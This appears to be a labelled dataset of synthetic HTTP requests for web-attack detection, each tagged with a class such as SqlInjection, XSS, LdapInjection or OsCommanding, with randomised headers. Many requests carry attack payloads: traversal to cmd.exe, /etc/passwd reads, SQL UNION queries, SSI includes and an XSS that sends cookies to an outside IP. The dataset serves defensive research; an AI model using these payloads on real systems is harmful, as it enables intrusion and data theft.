User-Agent: Mozilla/1.4 (X11; U; Unix 4.6; nt-io; rv:1.5.3) Gecko/76216572
UA-CPU: x86
Via: ape/0.9 209.174.31.101
Transfer-Encoding: compress
Upgrade: tic/8.0, oHra/5.7, iee/5.7, onys/7.1
Warning: 622 www.mBbt.shtml "ctEsmf" "Sun, 06 Apr 08 11:06:06 GMT"
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37731
Start - Id: 36468
class: OsCommanding
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.sxfRj.ch
Connection: keep-alive
Accept: audio/basic;q=0.4
Accept-Charset: macintosh, iso-10646-ucs-2;q=0.5, cp-936
Accept-Encoding: compress;q=0.8, gzip;q=0.3, identity
Accept-Language: rp-metnp;q=0.1
Cache-Control: 6nutohas='i1gxrc'
Client-ip: 171.165.21.220
Cookie: vya=s-;raheemotsrd=36;cr=04096358;1Soj1tmpdA3P8=el;Azsroati=sp7i;qi=yoemc
Cookie2: $Version="4"
Date: Thu, 02 Aug 07 15:54:22 CET
ETag: "DiWsWZsCWsn9Y0BlI_"
Expect: 100-continue
From: u3u4saNf@h5ldevB.be
If-Modified-Since: Sun, 25 Jan 04 22:15:29 GMT
If-Unmodified-Since: Thu, 11 Mar 10 11:00:49 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 11 Jul 05 06:34:10 GMT
Max-Forwards: 167
MIME-Version: 8.8
Pragma: wdlddr='EhEx'
Proxy-Authorization: NTLM RWVsZ1R0YXFwdGRyaDNhaWFpaVFnaWhtc0VwMm5vYTFsZ2FpZWNheXB0c2c=
Authorization: NTLM d3NlZGVTZWJ0bG1oNzNuZGNjb2VpZDBhc2E2ZXJmMWI4b2NkZGFt
Range: 57-,410056-,436232-1281
Referer: http://www.eCni.de/sattgp/Uwbeyg/einh/neodi/uyts.tar
TE: trailers,gzip
Trailer: Accept
User-Agent: 76feosy/0.6.7
UA-CPU: Sparc
UA-Disp: 640,8640,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1357x6667
Via: 3.4 www.wsi1.gif, 7.9 www.pntpsf.jpeg, 6.9 www.40SUl7wt.jpg
Transfer-Encoding: essd
Upgrade: fet/9.1, iro/2.9
Warning: 011 www.qtp2.jpeg "qrH18z" 
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 937987877
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 36468
Start - Id: 46462
class: PathTransversal
PUT /neH/rrC7tEqd/s_A/@XD.99Wb/Fpassthru@1.ffs.H/T7B/qq73R4/u6U9/bWX5q27WabSglAhJEK/OteahlOhzedflnL/eyk7ot2/OcanKalcVqwes.php? HTTP/1.1
Content-Length: 37
Content-Language: idnwoce7,tl
Content-Encoding: gzip
Content-Location: /hxue/hsurtaa/ilnas.png
Content-MD5: eGJlc3JLZGN0RVR0U3RiUQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 12 Jan 07 08:33:24 CET
Last-Modified: Mon, 20 Apr 09 17:37:29 CET
Host: www.m3Sea.fr
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.7
Accept-Language: ueb-eetgi1zc;q=0.9, wrmtrq-m;q=0.2, i-znel3;q=0.0
Cache-Control: a8cSnai='om10g5g'
Cookie: nfkLupdateEXBlib8=\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html;Sovli=gVsir tRmia+|;wns;t7us=533;ByEERrPnrB=guHteIumdol9aiw;it=eTcwAmdbe4
Cookie2: $Version="1"
Date: Thu, 15 Mar 07 15:11:31 GMT
Expect: 100-continue
If-Modified-Since: Tue, 19 Dec 06 16:02:10 UTC
If-Match: *
If-Range: "C9QvfeL-0OWQhFu"
Max-Forwards: 5012
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: ynon rijth=r1U4lr3
Authorization: lntc emqaeu=nnneznr
Range: -41
Referer: /sammcz/i0stn.bin
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/7.3 (X11; U; Unix 7.7; wE-ti; rv:0.9.8) Gecko/70768634
UA-CPU: Sparc
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 6681x6112
Via: 1.3 215.79.183.194, FTP/4.3 www.8hr7esns.shtml
Transfer-Encoding: gzip
X-Serial-Number: 220823715105637
----: ---------------

u7g=6tvoml2eatit&edet=5&ecze=65010012

End - Id: 46462
Start - Id: 37452
class: LdapInjection
GET /ehdQin@kxs-gnVR/1ttfoac9rnfE/niSraheveEysacEpCsl.htm?ZmpXriXlog=ae+ree4uIeo&mhtnnh=al&rombpctva=368&guMuza=6390&rra=wtoeD&sgreap7t=448466&wyahtougsniq=doP44iSWDta&dtzomdgtdo=mntila&VBFbyU=tahn&dgnhzj5ibe3nRa=n+a+&ZqBRNBHWXAWB=3387256&m1msuibV=ahutto HTTP/1.1
Host: 158.24.209.33:80
Connection: close
Accept: text/plain;q=0.1, text/*;q=0.5
Accept-Charset: windows-1251;q=0.1, iso-8859-8-i, iso-8859-9;q=0.4
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.2
Client-ip: 89.175.171.18
Cookie: V0mPKLWFVUNZ=)    ( |(    cn=*o   'brien*)(mail   =*o'brien* )   
Date: Sun, 22 Feb 09 15:33:51 CET
ETag: "0ivcECbLOyflmVyDNk"
If-Modified-Since: Mon, 31 May 04 24:35:42 CET
If-Unmodified-Since: Sat, 11 Apr 09 08:58:28 UTC
If-Match: "q_qHB9jlPMBs8Uh"
If-None-Match: "Ah-NCtA-Z_iJ6sR@"
If-Range: "JH7gQ6SlirKZ4@EO"
Referer: /sUden9q/tzewndh.mpeg
TE: gzip,chunked,trailers
User-Agent: eIV.jno http://www.hy3ldm.ch
Via: 9.1 220.197.109.161, nfrd/6.1 www.iyazt.tiff
Transfer-Encoding: deflate
----: ----------------------------

null

End - Id: 37452
Start - Id: 47482
class: XSS
GET /kmE0onhedhlviM/pu2Ik-1uzR/upj4gqpS/rmODkGiVv/aNjebE8jpD.asp?e9dam=hxW4h7&tDdcIlmasptrsh=28635146&zLmtunetsettaig=eGs&ps=inphp+i&st18locn4jat=%3Cxml+src++++%3D+%22++javascript%3A%5Balert%28%27riza%27%29%3B%5D++%22+++%3E HTTP/1.1
Host: www.esjn.ch
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: yiaioh9-s
Cache-Control: cex=t
Client-ip: 205.71.159.23
Cookie: ila6et=938741532
Cookie2: $Version="0"
Date: Sat, 02 Jul 05 18:26:57 UTC
ETag: W/"Q.aFiei1JBvNXi@"
Expect: 100-continue
From: ghun@e9ggr0ugra.com
If-Modified-Since: Mon, 22 Jan 07 24:22:29 UTC
If-Unmodified-Since: Wed, 12 Aug 09 09:59:31 UTC
If-Match: "6ws-g8rj4ia9UoU762a"
If-None-Match: "Jo5FcRmvfghqVjAzYkIH"
If-Range: Mon, 18 Aug 08 20:08:52 CET
Max-Forwards: 461
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: 6s4e rdvto=nzte
Authorization: jeobj itene=iembtoa
Range: 9183-933,-0
Referer: /Wble/Spoxbk/shir/hfEee/aoj2.ace
TE: trailers,trailers,chunked;q=0.2
Trailer: Authorization
User-Agent: 1teptegdep/7.2.8
UA-CPU: MIPS
UA-Disp: 2372,1267,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 747x653
Via: gIrrrH/6.6 www.rcjtdn.jpeg, tra/8.9 www.ahsnPpb7.htm, 6.1 www.nsoaofvo.tiff
Transfer-Encoding: RarD; asumeoya=gesiloB
Upgrade: ehTh/2.2, etnsh/9.8, hi5/2.0
Warning: 858 www.Bomdfr.html:92 "eaLxhrCi8Tuapar" 
X-Forwarded-For: 162.199.201.1
X-Serial-Number: 48112496441051
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47482
Start - Id: 47385
class: XSS
GET /gOp2q9QevalF2/oiOCrT3lc/14phpcOgU/o28GMDIgmiAaIiSkxI/jn/09udl09g.WLfc-n/ofoZsiFlTiXn@/-PtXTs8Rkms.jsp?heiin=%26%7B%5Bwindow.open%28%27http%3A%2F%2F216.103.160.164%2Fesroni.cfm%27%2Bdocument.cookie%29%3B%5D%7D%3B&Oameyr=0tmieOe39zntdd&essuthEtpnut=qi&eetx=rotaqrpamnfXrta&2t1me=aoPc8wLW&dtaahvourha5Ba=udaMoSiIr&gxstw8ne=FsSiss4aeoixA&threpnbzAenn8Ae=ksOuce&532be7oi=hmoliqE%2Fn%2B&ii=e%3Bselect%3ANorl4r&mvdekpddeSr=4079610 HTTP/1.0
Host: 114.130.89.225
Connection: keep-alive
Accept: application/*, video/mpeg
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=2
Client-ip: 28.115.64.238
Cookie: Eer4=iU7include ;lsY8Owjist=7u4all6]ldkonh;iYtd=uniigohnyF;Ucimsoen53ha=fs7uw
Cookie2: $Version="936"
Date: Wed, 01 Dec 04 19:36:09 GMT
ETag: "kE7_jBLtT1-VFt4Sc"
Expect: 100-continue
From: dhMEe9le@RpqtlrdwLb.be
If-Modified-Since: Wed, 17 Aug 05 20:49:32 GMT
If-Unmodified-Since: Tue, 14 Feb 06 07:01:48 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7856
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: cHest eInm=wotttdoe
Authorization: Basic aXBucmM6ZXNhY3U=
Range: 35419-,75138-2674,165640-
Referer: /av4mw/ranSit.cgi
TE: trailers,deflate;q=0.9
Trailer: Accept-Charset
User-Agent: Mozilla/9.0 (compatible; ktmnpptuz; Open BSD i386; th6e; sAadtlvsdc; slnss)
UA-CPU: MIPS
UA-Disp: 0297,0237,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1670x058
Via: 0.0 240.221.188.123, HTTP/0.4 www.eYEtzha.jpg:8, 4.3 www.ivo4he.css
Transfer-Encoding: Dihyda
Upgrade: vihit/6.1, e9om/9.5, eo8qd/9.3
Warning: 270 120.123.100.132 "hvi74Edbooyr" "Mon, 07 Jan 08 14:05:19 UTC"
X-Forwarded-For: 131.225.250.219
X-Serial-Number: 6529673477463
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47385
Start - Id: 48412
class: XPathInjection
GET /eH5vfaoiiOictNbae/n3EUxiE/yWen5ned/rUzi4d_.gif?6wNnudrrey8li=%5Coo&nw1oroe6htLqer=nm+&ppghp=dmltpRYwiedmaopoGe HTTP/1.1
Host: www.mzpd.biz
Connection: dethvAtg
Accept: audio/*;q=0.5, application/*;q=0.7
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 42.161.91.179
Cookie: snzmuu=iata'    or    path/child::node()[position()=N]  or  'naslXRef'  =  ';i3yftt1cethc=t wr]perlcgccadminngd0fneet;ndtnnId=485
Cookie2: $Version="4"
Date: Fri, 24 Dec 04 04:44:43 GMT
ETag: ".Lj17Nox0S6eIS0"
Expect: 100-continue
From: A2neohm@la7j9Ginh.com
If-Modified-Since: Wed, 27 Oct 04 09:28:41 UTC
If-Unmodified-Since: Wed, 01 Aug 07 02:44:23 GMT
If-Match: "kq-BIi4.MWecyY-WX4V"
If-None-Match: *
If-Range: Fri, 08 May 09 13:24:28 CET
Max-Forwards: 1
MIME-Version: 4.2
Pragma: Et='w'
Proxy-Authorization: Digest response="CdEdc9ADFAE4eb4Adb9195AfC0DfF9e6"
Authorization: rssoI rffar0i=5tBGnd
Range: 10-,-037175,0931-3
Referer: http://42towcj.com/pai6t/tpanar/lqgkt/t2eeL.php4
TE: trailers,trailers
Trailer: If-Range
User-Agent: he3fsKFe http://www.wfnvwbtr.com
UA-CPU: PowerPC
UA-Disp: 213,9851,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 0994x095
Via: FTP/9.7 60.31.149.158
Transfer-Encoding: deflate
Upgrade: nea/7.4, eNt/9.7, lsi/6.2, 2El/8.5, hravyc/9.6
Warning: 304 129.52.86.175 "bsnutzhax5htl" 
X-Forwarded-For: 83.226.88.8
X-Serial-Number: 86756657363
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48412
Start - Id: 35181
class: SqlInjection
GET /nltffsceaiNt/ByGkIkZQgPUCupt/yoy/acZZzfBBf4q/tStt2QaCvooKlPU/hxOI6lm0NGfOX0.opHAR/oweQ44-/evB/qUJ9/kdVG.h5kCLpbs7/KOprocessing-instructionz0BU9pEplog4fT.dll?WuTcdwrlvw2Oap=%27++%29++++UNION++++ALL+SELECT+++++%27oesntoxiii%27%2C8%2C10%2C%27eDl%27%2C0660++++FROM+hba0t+++++WHERE+%28%27%27++%3D+++%27&ttM=28&wOolNttcdm=klzztgEwwim2w%3A&QVrcpuqvIopt=lfLdZi&r9=EoknreeMlol6Oen&t8ae=c%28rm%26aie%24ero%25style9s&aLdoiEt3hNoeasu=yTt3e&gezsnEuohglownn=ti HTTP/1.0
Host: 174.184.242.153:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.4
Accept-Language: *
Cache-Control: eea=e8mkAx1f
Client-ip: 116.56.251.175
Cookie: ssdptwo=rr7fruJeh;mmdneJoecc=9869692
Cookie2: $Version="667"
Date: Sat, 29 Aug 09 06:44:21 CET
ETag: "03P6MG1v10dHj@5U"
Expect: twhn
From: as5oeh@nl7ehee.ch
If-Modified-Since: Tue, 23 May 06 16:55:25 CET
If-Unmodified-Since: Sat, 01 Aug 09 10:00:05 CET
If-Match: "wG3-ZJZPHvgZfN3drft@"
If-None-Match: "af2RR3WxHISuLZUy"
If-Range: Tue, 11 Apr 06 05:58:45 UTC
Max-Forwards: 2982
MIME-Version: 2.3
Pragma: AdmndsSs='5oUov'
Proxy-Authorization: ortr bdoanD=ot23oe
Authorization: Basic c2FyYWJMOmVwRXVpdA==
Range: -76801,392-,94069-
Referer: /iQeluoa/4ieI9qcl.php3
TE: trailers
Trailer: From
User-Agent: Mozilla/6.8 (compatible; Konqueror/3.2; SunOS sun4u; 2sooree)
UA-CPU: StrongARM
UA-Disp: 571,0582,16
Via: 6.7 www.eaab.htm, 1.1 115.68.202.133, 4.6 www.oroetH.gif
Transfer-Encoding: identity
Warning: 913 12.114.230.71:1507 "rGsmdofPbfah2t8sgGp" "Tue, 13 Jul 04 12:14:20 GMT"
X-Forwarded-For: 74.88.12.154
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35181
Start - Id: 38760
class: LdapInjection
GET /uN/s-x3FpZwfosS4@4I-1Z/lsnee0e1t6f/nfpatan/avso34aem4hinfp/iaswrasor/ywmPnSi/x2aOWPkcJbT1hW/e5ariohdoenOnds8memw/z8/nforiibvaie1l/e.ADjxe0.pl?Jp2wArO@Kj=weeJ&ot=aEi+tehxp_&ab8sqmhs2b=i%2B%28o&tgheleReeyevo=agocsetitxMetty6&ol1rsebwk0ts5i=w1r&PclAdGoL96=55&8Evyalensoeath=asdcmd65U0home%25u&aahoeytsrsaqh=Cark&Sof=a0d4-hH55GWJ&shy=4817150&ys04eoisya6U=%29++%28++%7C+%28displayName%3Dhad*%29+++%28name+%3Dhad*%29%28++mail%3Dhad*+++%29&soompn=t2ze&rse=eir2tes&thnIrsoetbscye=sf5%27tNHdtchws+I HTTP/1.0
Host: www.nrs0.org
Connection: aRi4
Accept: audio/basic, image/jpeg
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-transform
Client-ip: 185.134.129.220
Cookie: 4gleyt=704144;dakdLrteierab=tO5
Cookie2: $Version="4"
Date: Sat, 20 Mar 04 21:38:08 GMT
ETag: "b2R@sMIXD.Z0eAZ@-tX"
Expect: jhiihuo=5eokc
From: Dddcd@u4uew8d4.be
If-Modified-Since: Tue, 02 May 06 15:44:31 GMT
If-Unmodified-Since: Sun, 19 Feb 06 14:14:40 GMT
If-Match: *
If-None-Match: *
If-Range: "6X9scFNiq4Uwwz7vtyD"
Max-Forwards: 0949
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest nc=d1acEBc7
Authorization: NTLM c3JvdGV1M0UzZVJmMThtYXVBcGxlbmVUbjNOZGR4Zm9oc0Ewc2w=
Range: 66-7077,754235-107,-0401
Referer: /Lhrodap.php
TE: trailers,gzip;q=0.1,trailers
Trailer: Accept
User-Agent: fLuqTm http://www.sagoeo.fr
UA-CPU: Sparc
UA-Disp: 372,5525,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8698x991
Via: esme/3.2 www.evhw.gif
Transfer-Encoding: gzip
Upgrade: y68as/2.9, ppdtdc/2.6, 4msh/1.8, tte/9.4
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 15.223.231.187
X-Serial-Number: 99237184639
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38760
Start - Id: 44854
class: PathTransversal
GET /i@/yBWS.1.css?KRBCPn3m=4tT3DawdiviiwhtT&y1ecMs5=Rj&l1dkbctigud=collection%28++file%3A%2F%2F%2Fc%3A%2Fgyt8%2Fsaepwas.xml%29&sqyepqaeld4H2=1&y6sY5aN=%291vr&tpyEa6darfsrly=nbm&AwN2si2rhey=lEdnxlNnEd HTTP/1.0
Host: 98.100.227.7
Connection: 0nhhhOur
Accept: audio/x-wav, application/*;q=0.6, audio/x-wav
Accept-Charset: iso-10646-ucs-2, iso-8859-7, koi8
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=45
Client-ip: 99.178.36.179
Cookie: 5jTEmt@-KyKinput=8ehe97
Cookie2: $Version="89"
Date: Tue, 19 Feb 08 20:34:34 GMT
ETag: W/"2Hr_1mB_sXpKsq.@5EV"
Expect: eloob=qdejeads
From: netotmi@oanhTettwr.cz
If-Modified-Since: Tue, 04 Apr 06 05:37:57 UTC
If-Unmodified-Since: Mon, 12 Feb 07 22:41:03 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 30 Nov 05 09:04:19 GMT
Max-Forwards: 063
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic dWRlNmk6eG1ocHA4Zjk=
Authorization: grc8oR eiegtimg=espmsrio
Range: 3752-,303-8,-33345
Referer: http://r2eilmog.uk/bnhlyEeI/FhhcaaTb/nDr4/oites.bin
TE: trailers,trailers,gzip;q=0.8
Trailer: From
User-Agent: oELLJV9k http://www.rgsooe.com
UA-CPU: StrongARM
UA-Disp: 5979,4863,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 458x842
Via: 7.9 www.uwoqrttt.htm, HTTP/7.8 113.147.68.116
Transfer-Encoding: gzip
Upgrade: elir/9.8, ylr/3.8, e0ge7/5.0, Son/5.8, deHi3/3.2
Warning: 565 www.9hmbio.js "egRIp9dtnpPtahcsat" 
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 65016581
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44854
Start - Id: 38619
class: LdapInjection
GET /lJH86G4F/nO/@IxsvKLLZinn/SaumwZ8OdV/HwEPWoP.03h.B/aeda2teoeabhetche1/rcz5x_gcbRrbgsLSnk/e3L/e03mO3cB7IhPty2KEk/eaeleDd/oQc.MVyb-ymlHu6Z@Ws./lZktrict0rqEfYOgrwix.gif?2steomc5gml=wnir&Etmp6g=irrgsb%28ee%28th&HLtB=8h&Clntesi=gfSodpHr&HaaraNas=nnoe6rneto&inecpdb=et8l4deryoaJsct&evalo@.mocha=733%29%28%26%28objectClass%3DnOk%29%28%7C%28sn+%3D+il%29%28cn%3D5snj+++J*%29%29&hdas1so=s%7C HTTP/1.1
Host: 77.186.241.113
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-5, isiri-3342
Accept-Encoding: gzip;q=0.6, compress, identity
Accept-Language: *
Cache-Control: no-transform
Client-ip: 54.188.209.237
Cookie: C6H0is=aLEiexectt/prLctmp;ve2mto=3a;tei3Y3mcms=t3etn0icpg;jc98odu=r0o-kt8nw8likeinnacE
Cookie2: $Version="2"
Date: Tue, 13 Apr 04 10:51:52 GMT
ETag: W/"78VQV6Gzdd4iSe."
Expect: 100-continue
From: hlpn3e9@tbllex.fr
If-Modified-Since: Sat, 09 Feb 08 21:05:11 GMT
If-Unmodified-Since: Tue, 02 Oct 07 15:54:54 UTC
If-Match: "CFnN3qlGyaNj@Mz"
If-None-Match: "sjSn5qbZ3i5NKpNA"
If-Range: "2nrs__Eu2QeAlWIfe7Y"
Max-Forwards: 5
MIME-Version: 0.3
Pragma: hre=a8tkfii
Proxy-Authorization: Digest nc=aD8e32C0
Authorization: NTLM ZGk5aGVhQXRzdGRjZXlBaWd0ZXB0bzhuMG1ib3NvbnA2bG5h
Range: 863-0,-075,-8921
Referer: http://www.rbnh.ch/slnte/osmoadyn/odew3/pann.asp
TE: trailers,trailers
Trailer: If-Range
User-Agent: jbIaorEll
UA-CPU: x86
UA-Disp: 7529,000,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5976x789
Via: HTTP/1.6 58.166.3.169:923
Transfer-Encoding: identity
Upgrade: rpeyc/9.4, l7e/9.7, Ouhf/0.7, rzONo/2.0
Warning: 221 www.yahrm.jpeg "dsaeopr0wq2uo" "Thu, 14 Jul 05 01:23:19 CET"
X-Forwarded-For: 248.9.49.144
X-Serial-Number: 325446948
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38619
Start - Id: 44298
class: OsCommanding
GET /scripts/file.bat/..��..��..��winnt/system32/cmd.exe?/c%20dir%20C: HTTP/1.1
Host: www.Xoir.fr
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: x-mac-arabic
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: max-age=517
Client-ip: 86.249.82.37
Cookie: uiao=v:t;b9adtisiucnhSda=NtllargineEaha;ifbt=vr665oenrtneoYmt;eameb0ende=autoexecall;qvaPij=s o5a
Cookie2: $Version="583"
Date: Fri, 17 Feb 06 03:29:44 GMT
ETag: "z-wEaS4pP5@ex2B"
Expect: 100-continue
From: l1Bt7@hnsv2sT9.net
If-Modified-Since: Mon, 26 Jul 04 09:17:10 CET
If-Unmodified-Since: Sat, 11 Sep 04 17:03:51 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 08 Jun 06 05:24:57 UTC
Max-Forwards: 95
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="herhr"
Authorization: NTLM cnQ3aGZzcmVjcGluazZlY2NyaXNnRG5uZTdubXRvc2Nob29sZWNOc2VxeURhbg==
Range: 3-
Referer: /tieDs1/acvsi.cfm
TE: chunked,trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/9.1 (Windows; U; Windows NT 7.9; ee-he; rv:3.3.1) Gecko/80461604
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 521x0746
Via: Tei8/8.8 205.87.46.2
Transfer-Encoding: compress
Upgrade: ucktla/1.6
Warning: 525 251.120.159.217 "ay2yetttoyyhQsouLs" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 7359375071
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44298
Start - Id: 40561
class: SSI
GET /lMPU8lDJ52Yur79/bDeeZsf@U5mKU-Eca5/aatnttwchyrtu.jpg?nW2T3UPxHY=55dq&JwrqMk9nSXUO=i4e&nhwsdekne=%3C%21--%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++--%3E&re=erq&erCtitieiiea=sgjh&DFi8igopbng=25&imh6iaerenn=15870596&jSgd=k HTTP/1.0
Host: 30.150.204.138
Connection: keep-alive
Accept: text/*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 99.30.78.189
Cookie: d4hairagrsraja=1 T[o;DZ374oCIh6q=4667471296;iipghez=9818302;nufr8otHkeemy=<msI;ECR0H@W=i.P@aXp56y
Cookie2: $Version="29"
Date: Thu, 21 Sep 06 10:01:53 GMT
ETag: W/"Dj0WChA0ftcfzanu3"
Expect: 100-continue
From: tyoPDg0e@eA2xhe.com
If-Modified-Since: Thu, 22 Jan 09 07:34:29 GMT
If-Unmodified-Since: Sat, 04 Mar 06 21:02:32 UTC
If-Match: *
If-None-Match: "YpqIZcDHee6yEJVAw56L"
If-Range: Sat, 30 May 09 10:53:02 CET
Max-Forwards: 09
Pragma: A='o'
Proxy-Authorization: esno rs47tyd=n7dsbg
Authorization: Digest realm
Range: 488078-9765
Referer: /iarE.php3
TE: chunked;q=0.6
Trailer: Pragma
User-Agent: Mozilla/1.8 (X11; U; SunOS sun4u 1.0; aa-ae; rv:4.0.0) Gecko/65651466
UA-CPU: PowerPC
UA-Disp: 9897,2290,16
UA-OS: Windows 98
UA-Pixels: 0455x286
Via: 7.1 2.144.27.25:34
Transfer-Encoding: compress
Upgrade: nmoNa/7.1, shl/2.8, suah/2.9, drnip/9.7, aunle/8.8
Warning: 885 www.ctsaoon.js "2nm3fnnnfehteoPv" "Sun, 30 Sep 07 18:31:53 UTC"
X-Forwarded-For: 93.136.204.39
~~~~~: ~~~~~~~~~~~

null

End - Id: 40561
Start - Id: 40505
class: SSI
GET /nMZJ/odre6isopalif/gmdsnetr.jpg?ahnhmt3=ae3ehe%3Fi4lc&Tyt=s9sedarrer3sor&qAnkM=mea&itte=593&mvgcnc5us0=+d%24xselect9zyrYrrOt%7Cn+h&qaamtipaoetlode=%3C%21--++%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++--%3E HTTP/1.0
Host: 115.214.103.97:02
Connection: keep-alive
Accept: text/xml;q=0.7, video/mpeg, video/quicktime;q=0.4
Accept-Charset: iso-2022-kr;q=0.6, windows-1250, iso-2022-jp;q=0.7, windows-1253;q=0.2, cp-936;q=0.6
Accept-Encoding: identity, compress
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 68.175.116.43
Cookie: siifsttpAe=Gnrsr;8stzyq=<et\d;tmst=odue
Cookie2: $Version="510"
Date: Mon, 07 Nov 05 24:33:51 CET
ETag: W/"k5QWemeMMlDKpQQIF@"
Expect: 100-continue
From: pe1n3lw@grPaOzeer.st
If-Modified-Since: Mon, 02 Oct 06 12:27:45 GMT
If-Unmodified-Since: Tue, 02 Mar 04 23:55:22 CET
If-Match: "CdXCsyDoYKeF_m_"
If-None-Match: *
If-Range: "WsfV9IF-k_@@r61"
Max-Forwards: 9042
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: NTLM RWV0b1dIcmVlbkZoZnJyc3RwRGFSM3JobmN1ZW54aUFlbml4NTZodE9waWw=
Authorization: NTLM b2VmdHNzOHRzbmtuaHRvYW10aXNUdGVpZWVhMG5lZ2VmbnJ0OXN0cmVlZXI2dA==
Range: 049-19497,328865-,-538
Referer: http://www.xDsoeb.net/nVsf/egah5ept/4wbler/qejd/id8WeN.wav
TE: chunked,chunked,gzip
Trailer: Accept-Language
User-Agent: fdzzy0j5g7 http://www.ia6Wyd.st
UA-CPU: 68000
UA-Disp: 591,998,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 278x2627
Via: 4.2 109.169.206.32
Transfer-Encoding: deflate
Upgrade: stscth/0.9, onhEnx/5.9, pp0sG/4.5, we6h/6.0, dwhd/5.7
Warning: 074 www.Paeas.jpg "itu3brrfrgi6re2o3th" 
X-Forwarded-For: 252.212.230.66
X-Serial-Number: 7235239060397255727
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40505
Start - Id: 38049
class: LdapInjection
GET /htwn11v2nlbwa/dnIzheS59TS4Qv.-f/ahf.000VltfWMIkI3_L/tx4WCgOgg/t7xtEs/mochahtpassfJnM/rcm5mn/idE2rt9mUbgsoundDVTX/ehnEmmrer7ohaaumth/nyjethioIwb.cfm?OFnNooe8nE6to=5634&eeaD=f%7Criframe&insertCv.yWxws=f%3Ekdocument+%29iyrh&4winntfwX3Ud=8ft%3D&gqn=Vo1l%29%28%7C++++%28Tit%3D*%29&gL72Psfp=98591095&w4.sq-nvWk5=2541801&Aw0EF21BphpL=mehiUqAle+havinga&ypftn4Vieod6a=cahih2cothth HTTP/1.0
Host: www.ooohn7h.com
Connection: close
Accept: image/png, application/rtf;q=0.4, video/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: e-ee;q=0.0, eyeDspe-rjcn
Cache-Control: no-transform
Client-ip: 26.50.164.170
Cookie: t5naqeasolsIBli=n.225RvR4hZX;ghosoh=11611
Cookie2: $Version="114"
Date: Sat, 29 Nov 08 01:57:35 GMT
ETag: W/"xYZoPZGX1onU_eKg0nd"
Expect: oTo0xsi=menaree;nEnewski
From: iead@9maexk.uk
If-Modified-Since: Fri, 23 Apr 10 02:03:29 CET
If-Unmodified-Since: Fri, 19 Feb 10 04:04:32 GMT
If-Match: "k0yCh91G7VEhX1q"
If-None-Match: *
If-Range: *
Max-Forwards: 47
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic dXVnbmU6ZVpob0ppeg==
Authorization: Digest cnonce="cz8e8weo"
Range: 6583-,350-4,-7502
